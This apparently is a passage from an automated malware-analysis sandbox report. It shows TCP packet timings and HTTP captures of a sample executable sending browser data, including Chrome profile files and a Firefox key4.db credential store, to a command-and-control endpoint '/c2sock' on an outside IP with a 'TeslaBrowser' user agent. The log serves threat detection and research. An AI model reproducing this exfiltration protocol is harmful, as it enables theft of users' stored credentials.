                                                                  Nov 13, 2024 10:53:01.181865931 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.229727983 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.229809999 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.277575970 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.277687073 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.325370073 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.325480938 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.373375893 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.373491049 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.425461054 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.425553083 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.473414898 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.473525047 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.521442890 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.521537066 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.569613934 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.569755077 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.621473074 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.621557951 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.669476032 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.669579983 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.721515894 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.721662045 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.773514032 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.773643970 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.825587988 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.825771093 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.873554945 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.873677969 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.921413898 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.921581984 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.969419956 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.969634056 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.017484903 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.017602921 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.069408894 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.069562912 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.121418953 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.121474981 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.169405937 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.169481993 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.221631050 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.221688986 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.269370079 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.269500971 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.317462921 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.317629099 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.365457058 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.365550041 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.413546085 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.413662910 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.461529016 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.461642981 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.509419918 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.509521961 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.561386108 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.561510086 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.609699965 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.609797001 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.657543898 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.657614946 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.705400944 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.705554008 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:02.706746101 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:02.710511923 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:03.004311085 CET5001180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:03.009424925 CET805001194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:03.009517908 CET5001180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:03.009649038 CET5001180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:03.010031939 CET5001180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:03.015068054 CET805001194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:03.015404940 CET805001194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:11.490643024 CET805001194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:11.490787029 CET5001180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:11.490865946 CET5001180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:11.495692968 CET805001194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:11.774096012 CET5001280192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:11.779071093 CET805001294.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:11.779155970 CET5001280192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:11.779273987 CET5001280192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:11.779647112 CET5001280192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:11.784120083 CET805001294.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:11.784761906 CET805001294.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:20.255753040 CET805001294.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:20.255944967 CET5001280192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:20.255944967 CET5001280192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:20.260782003 CET805001294.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:20.667278051 CET5001380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:20.672370911 CET805001394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:20.672472954 CET5001380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:20.672610998 CET5001380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:20.672972918 CET5001380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:20.677437067 CET805001394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:20.677766085 CET805001394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:29.154710054 CET805001394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:29.154804945 CET5001380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:29.154872894 CET5001380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:29.159842014 CET805001394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:29.411429882 CET5001480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:29.417093039 CET805001494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:29.417304039 CET5001480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:29.417304039 CET5001480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:29.418088913 CET5001480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:29.422947884 CET805001494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:29.423002005 CET805001494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:37.908978939 CET805001494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:37.909183979 CET5001480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:37.909183979 CET5001480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:37.914283037 CET805001494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:38.175916910 CET5001580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:38.221759081 CET805001594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:38.221930981 CET5001580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:38.222455978 CET5001580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:38.223850965 CET5001580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:38.227410078 CET805001594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:38.228759050 CET805001594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:46.703774929 CET805001594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:46.703990936 CET5001580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:46.703990936 CET5001580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:46.709033012 CET805001594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:46.983675957 CET5001680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:46.989391088 CET805001694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:46.989481926 CET5001680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:46.989612103 CET5001680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:46.989995003 CET5001680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:46.994539976 CET805001694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:46.994981050 CET805001694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:55.471035004 CET805001694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:55.471169949 CET5001680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:55.471215963 CET5001680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:55.476258039 CET805001694.158.244.69192.168.2.4
                                                                  • 94.158.244.69
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.44973694.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:51:51.037914038 CET190OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 24083
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:51:51.038527966 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                                  Nov 13, 2024 10:51:51.046231985 CET1236OUTData Raw: a7 f7 5d 0a 65 dc 0b 9d ea fe a0 1c a8 b5 3b 5b 56 db a0 3d d6 96 b5 a3 58 a6 d2 a2 bd 87 6e b2 2e b1 ad 2b f4 31 aa ab f4 a9 dc 7d a4 03 6d b6 4a 22 86 df b6 ba a3 0c 89 72 69 1f 44 a7 3c 6a 55 a7 ad e6 2a ed dc 0c ad 6d a8 c1 fe 62 ef d8 37 a2
                                                                  Data Ascii: ]e;[V=Xn.+1}mJ"riD<jU*mb7N3x7WT~v5E;.U2;A:`joznP^2C_%Dw=s56sNMjj[;)fD;H.g^&qKc[z38-zOhk4i`
                                                                  Nov 13, 2024 10:51:51.046260118 CET2472OUTData Raw: 18 69 f8 fd 7f 00 00 00 00 00 00 80 d1 87 cf ff 01 00 00 00 00 00 00 46 1f e6 ff 00 00 00 00 00 00 00 a3 0f bf ff 0f 00 00 00 00 00 00 30 fa d8 e7 ff e9 89 97 b9 dc 2d e2 b7 73 ff 92 bd 9c 7b 78 e2 65 d1 c8 7e 83 03 00 00 00 00 00 b8 39 74 8e c7
                                                                  Data Ascii: iF0-s{xe~9t-m9qe4u>YbmgZ6nCwdC5mAmugKrUwe^5"/U9Uf<.rIZH^>NvxldZw&2O$9+l
                                                                  Nov 13, 2024 10:51:51.046351910 CET4944OUTData Raw: a2 13 47 a5 35 3b ea 92 ae 4e 2c ad aa b2 c2 eb 66 5d a5 46 c4 57 5d dd ec f1 0a e5 3b 72 63 31 0d c5 21 7b a1 6c 6d 42 3a c9 47 63 7c bf ab be 92 34 ee f0 2e 2a 50 68 39 ef 8a 52 a9 94 39 d8 3e e4 1b 52 ab 99 6e db 77 a6 d2 eb 23 b2 37 ee fd 44
                                                                  Data Ascii: G5;N,f]FW];rc1!{lmB:Gc|4.*Ph9R9>Rnw#7D_Q][.oaP}Bq_dW"eTic$|;*Yowg:aGcw^k^#95>^NRfuu!@W>y8Uc
                                                                  Nov 13, 2024 10:51:51.046381950 CET4307OUTData Raw: 4f 7f 94 45 2c ea 72 8d 0e 67 1f 70 99 92 31 3c 2f 70 2f 87 1e b3 d7 b7 59 4c a6 be ed 9c 70 a8 a9 b5 3b 25 40 b6 ec 9d 61 73 fe 8b 20 97 b5 2d d8 9e 0e f4 e8 f3 5b 48 27 d6 fc b6 f9 ae 01 f6 81 59 c7 4b 8f 3c ab 60 d6 20 a9 ab 70 89 cb 56 2f 1f
                                                                  Data Ascii: OE,rgp1</p/YLp;%@as -[H'YK<` pV/Y%%nS>:i]TTf_,XxQw'Fscxf|m7-8+Tyr]Ej[_'wh7g2I]M iz
                                                                  Nov 13, 2024 10:51:51.069289923 CET1236OUTData Raw: 0d 38 99 b5 6d a1 3a 25 77 58 29 23 37 88 da 80 cc 6f 16 9f e0 3b e2 bf 05 5c 55 6f ba 77 45 ca 0e ad d2 20 0d 0c 60 ea 4b 3c 6d 87 74 3c 16 f0 af 20 31 81 2a 1c c0 8e 26 83 9a cc c4 8f 7c f1 e9 47 53 fb fe 0f 7c af 16 d1 b8 1e bc 00 50 4b 07 08
                                                                  Data Ascii: 8m:%wX)#7o;\UowE `K<mt< 1*&|GS|PKXLPKy&mY(Chrome/Default/BrowserDB/MANIFEST-000001)|"leveldb.BytewiseComparatorPKP{.)


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44974394.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:52:00.026247025 CET190OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 11665
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:52:00.026686907 CET11665OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.44979394.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:52:08.984435081 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:52:08.984817982 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.44984494.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:52:17.973020077 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:52:17.973377943 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.44989594.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:52:26.710982084 CET188OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 440
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:52:26.711991072 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.44994494.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:52:36.046396017 CET190OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 20373
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:52:36.046822071 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
                                                                  Nov 13, 2024 10:52:36.051237106 CET1236OUTData Raw: da 3d 59 5d 79 cd 7a 71 72 3a 1e ee da 91 77 df 00 ba ee 61 ad 56 46 47 1f 7a 7b 66 e4 f4 9e ad ce b6 ee 91 b5 4f b4 ee 94 5b 97 53 6f cb 8e 8c ef eb de 3f 56 b2 2e 94 a2 65 6e 6f 8f bd b3 6e d9 74 21 f7 a9 d9 b9 98 d7 65 e7 77 b6 5e 5b a5 46 97
                                                                  Data Ascii: =Y]yzqr:waVFGz{fO[So?V.enont!ew^[FS7o=Zuw1}FO"#7eGZBnPW3%[*4z~oxQ+IiP|;vWhh_>wIz]G_{>6=>
                                                                  Nov 13, 2024 10:52:36.051898956 CET2472OUTData Raw: 2c 4c 2e 14 67 4a cd 85 07 57 d2 f6 cc 14 eb e7 1a d5 c5 f7 c7 59 f5 6a b3 36 5d 7c 70 aa 5a 3d b7 50 a8 9d ab ef 69 54 ab e5 a9 42 ad 95 39 5d 58 58 2c 94 e6 2a 0f 56 8a 17 f7 34 eb c5 5a bd 9d 5c ad 34 8a 95 c6 83 7b e6 ca d5 a9 42 79 e3 61 4c
                                                                  Data Ascii: ,L.gJWYj6]|pZ=PiTB9]XX,*V4Z\4{ByaLLoN=zKny\#[ozqTQ4E{|vW?7vallj/->~#w--`2X~.@W{oMntZQ*3i?S
                                                                  Nov 13, 2024 10:52:36.052175999 CET2472OUTData Raw: 9f 84 ff 39 fc f7 e1 6f 87 ff 32 fc 47 e1 af 84 61 58 8b 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 ff 96 6d a9 4c 22 c8 64 5e 0e 0f bc 3e bf 6d 35 72 df 2b 8b 37 74 47 86 ba 23 b9 ee c8 60
                                                                  Data Ascii: 9o2GaX2mL"d^>m5r+7tG#`w$Y<H;$oHerP<@7O__+~nNH?s_{gL.?~!N:x#>pt8thTyl2vz
                                                                  Nov 13, 2024 10:52:36.052908897 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Nov 13, 2024 10:52:36.053034067 CET597OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: PKD)PPK&mY(0Mozilla Firefox/fqs92o4p.default-release/key4.dbPK


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.44999194.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:52:45.027837992 CET189OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 1135
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:52:45.028214931 CET1135OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.45001094.158.244.69801352C:\Users\user\Desktop\g1kWKm20Z5.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 13, 2024 10:52:54.232328892 CET191OUTPOST /c2sock HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                  User-Agent: TeslaBrowser/5.5
                                                                  Content-Length: 575172
                                                                  Host: 94.158.244.69
                                                                  Nov 13, 2024 10:52:54.232878923 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                                  Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
                                                                  Nov 13, 2024 10:52:54.237184048 CET1236OUTData Raw: fc 9c cb aa ad e5 f2 4a 6b 69 f5 f7 67 64 f5 df 2a 36 59 e7 71 5c 24 ab 2e 2d fe 4c f9 a9 a6 86 fe c6 a1 94 95 97 88 fc b5 b5 ac b8 b8 bb 59 fe 97 6e a7 ea cd b2 3f 57 4a cf d2 0b 45 fe 54 6d 2d 17 d4 6c 9e fb 63 b5 2d 79 f6 0f 95 e6 f2 fb 6a 22
                                                                  Data Ascii: Jkigd*6Yq\$.-LYn?WJETm-lc-yj"\<}~<3UZ_RxgT3+QMWiDR+EVY'tfO+'(_53yJz~XK[H-5?TI{\UO
                                                                  Nov 13, 2024 10:52:54.237996101 CET4944OUTData Raw: 7d 1e b7 3a 59 ff 87 eb ae ba 40 f8 1f 8c 10 f7 e2 b9 86 2d 8e 4c 18 1e 77 3c 9e ac 5a 41 6e 87 dc fb c8 eb e8 15 4e 47 e6 47 76 47 ef a7 ee b3 71 74 0d ae 47 35 7d a8 19 e4 75 7d fc f3 e0 84 bc 86 90 db 61 af fb 5f d1 fa c0 22 f5 82 ea 7f ed 8b
                                                                  Data Ascii: }:Y@-Lw<ZAnNGGvGqtG5}u}a_"_{7ox_uOOOOOOIe+RMCFD`X)ql?s9a?f~d1c6 _`3@x`~6|
                                                                  Nov 13, 2024 10:52:54.238018036 CET4944OUTData Raw: b1 d7 42 f7 b3 d6 b7 4f f2 98 5c cf ee 01 61 06 48 b6 87 5c bf 47 25 f2 3f 3a 86 ff 45 56 e8 e8 ff e5 33 01 5d 06 08 ef e3 7d c2 d8 fd c1 cd 0f b5 81 f0 3f e9 7b 38 c6 b5 eb 76 ab da f0 73 d2 06 65 1f b0 ab 3f 57 d6 f3 f1 9e 5d 5e df c7 9d cf 57
                                                                  Data Ascii: BO\aH\G%?:EV3]}?{8vse?W]^W'SKe~Y5^R5zGOeSk`P?~3?L?~}e}%]|_Z/>X 7|ty/s
